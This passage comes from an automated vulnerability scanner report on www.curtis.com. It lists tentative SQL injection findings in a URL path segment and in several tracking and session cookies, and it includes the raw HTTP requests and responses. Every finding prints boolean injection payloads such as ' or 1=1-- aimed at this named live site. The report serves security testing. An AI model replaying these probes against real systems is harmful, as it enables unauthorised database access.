Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175975;path=/
Set-Cookie: CFTOKEN=25170816;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.33. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382433'%20or%201%3d1--%20 and 15382433'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm15382433'%20or%201%3d1--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sitecontent.cfm15382433'%20or%201%3d2--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.34. http://www.curtis.com/sitecontent.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 74416649'%20or%201%3d1--%20 and 74416649'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:00:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.35. http://www.curtis.com/sitecontent.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 13432204'%20or%201%3d1--%20 and 13432204'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.36. http://www.curtis.com/sitecontent.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 70094951%20or%201%3d1--%20 and 70094951%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d1--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d2--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.37. http://www.curtis.com/sitecontent.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 15928176'%20or%201%3d1--%20 and 15928176'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.38. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10251358'%20or%201%3d1--%20 and 10251358'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:39 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
